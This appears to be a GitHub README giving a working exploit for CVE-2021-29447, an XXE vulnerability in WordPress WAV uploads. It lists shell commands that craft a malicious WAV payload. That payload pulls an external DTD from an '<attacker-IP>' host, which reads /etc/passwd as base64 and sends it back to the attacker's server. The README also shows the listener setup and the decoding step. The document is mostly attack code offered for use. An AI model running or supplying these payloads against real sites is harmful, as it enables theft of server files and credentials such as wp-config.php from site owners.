31 lines
923 B
Markdown
31 lines
923 B
Markdown
|
# CVE-2021-29447
|
||
|
|
|
||
|
|
* Upload of wav file has following consequences
|
||
|
|
* **Arbitrary File Disclosure** for example `wp-config.php`
|
||
|
|
* **Server Side Request Forgery**
|
||
|
|
|
||
|
|
|
||
|
|
## Usage
|
||
|
|
|
||
|
|
* Create `wav` Payload
|
||
|
|
```sh
|
||
|
|
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<attacker-IP>:<Port>/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
|
||
|
|
```
|
||
|
|
* Create `dtd` Payload, which is downloaded from attacker machine by the wp instance. Following payload
|
||
|
|
```sh
|
||
|
|
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
|
||
|
|
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://<attacker-IP>:<attackerPort>/?p=%file;'>" >
|
||
|
|
```
|
||
|
|
|
||
|
|
* Launch http server
|
||
|
|
```sh
|
||
|
|
php -S 0.0.0.0:8000
|
||
|
|
python -m http.server
|
||
|
|
```
|
||
|
|
* Copy returned base64 into `php` file
|
||
|
|
```php
|
||
|
|
<?php echo zlib_decode(base64_decode('<returnedBase64>')); ?>
|
||
|
|
```
|
||
|
|
|
||
|
|
|